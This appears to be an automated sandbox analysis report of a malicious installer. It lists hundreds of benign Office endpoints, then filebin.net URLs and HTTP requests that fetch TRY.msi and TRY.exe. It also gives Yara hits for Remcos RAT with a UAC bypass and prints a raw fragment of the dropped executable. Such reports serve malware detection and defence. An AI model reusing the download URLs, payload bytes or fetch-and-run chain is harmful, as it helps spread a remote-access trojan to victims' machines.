Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://augloop.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cdn.entity.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cortana.ai
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cr.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://directory.services.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 54841c.rbs.3.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/
Source: 54841c.rbs.3.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/$
Source: PowerShell_transcript.377142.szj6FUBY.20220420092838.txt.17.dr, files.cab.4.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.exe
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi
Source: ~DF20598E5DAB6B2B3C.TMP.3.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-180029104309546480
Source: ~DF20725BC976A732BA.TMP.3.dr, ~DF3B9CC377E0CCEDD0.TMP.3.dr, inprogressinstallinfo.ipi.3.dr, ~DFFFE9197EB1FCF16E.TMP.3.dr, ~DFAB5AE087B19AB60D.TMP.3.dr, ~DFAC439D90DB59E05A.TMP.3.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://graph.windows.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://invites.office.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://login.windows.local
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://management.azure.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://management.azure.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://osi.office.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://roaming.edog.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://tasks.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown

DNS traffic detected: queries for: filebin.net

Source: global traffic	HTTP traffic detected: GET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows InstallerHost: filebin.net
Source: global traffic	HTTP traffic detected: GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072814Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=81a6b2d7f153c8ae19ac27531faf11add08f39212f5a9e9b8b8b46feec74e3da HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows InstallerHost: situla.bitbit.net
Source: global traffic	HTTP traffic detected: GET /rf43v6qzghbj7h7b/TRY.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: filebin.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/7ff329000ec5f0e56f28414ebbe22f0c0905296169e7398f417a543e662f9503?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072844Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.exe%22&response-content-type=application%2Fvnd.microsoft.portable-executable&X-Amz-Signature=c205dd25825136b9a5d453fd33964b1791fdc2217c3bde2a85904dc7ce3c2af9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: situla.bitbit.netConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443

Source: unknown	HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.238.33.8:443 -> 192.168.2.5:49744 version: TLS 1.2

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown

Document contains OLE streams with names of living off the land binaries

Source: MSI94E.tmp.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d......&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................................................E3.H.B.A.....A.W...I;.E.G.E..xGH..t"L+.L+.I...H..t.A.....t...H..H...u.H..H.A.H.E.H..E..A..A..z........H..t....A.........E3.L..M..H..A.W...I.B.H=....E.G.E..x5I..H..M..t..8.t.H..H...u.H..H..E..A..E#.H..t.M..L+...E3.E..xXI..I...I+.t.H..M......I+.L..L+.M..t.A.....t...I..H..H...u.H..H.B.H.E.H..E..A..A..z......A.........L.D$.L.L$ SVWH.. 3.H.B.H=....H...W....G...x5H.Z.H..H..L.L$X3.........x.H.H;.w.u.@.<3..@.<3.z.....H..t......H.. _^[..........H.\$.H.l$.VWAVH......H..,...H3.H.D$pL..f.D$l..3.H.........l$h......H..H........H......H....1...H..H..taH.D$`A..H.D$PD.E .l$HH.L$h.l$@.}..l$8A. ....l$0...l$(.l$ ...~....t.H.T$`M..3.H........H.L$`...~..H..........H.L$pH3...i..L..$....I.[(I.k0I..A^_^.........H..H.X.H.p.H.x.L.p UH.h.H......H.."...H3.H.EG..Y...E3.D.u?f.EC..D.u'A.^.;...P...H.M'.........&.........H..L.E/.S....~......!...H.M/H.E+E3.H.D$ E3......}.............~....z.......U+3...<...H..H........D.M+H.E+H.M/L....H.D$ ..t}..........H.E7A. ...H.D$PH.M?D.t$HA. ...D.t$@..D.t$8D.t$0D.t$(D.t$ ..u}....t@A..D97v......H.U7..H..H.L....`}....u...;7r.....*....]'H.M7...}..H....(~..H.M/...}...E'..............E'...E.......H.MGH3...g..L..$....I.[.I.s.I.{ M.s(I..]........H.\$.WH..0...H..d...H3.H..$ ...I..I..H........t!...u.I......I...w.H....U....P3..Q..q...H..H...F4..H..w...L.D$ A......D$ .........L.D$ .?...H....$.................H..$ ...H3...f..H..$H...H..0..._..........H.\$.H.l$.H.t$.WH.. 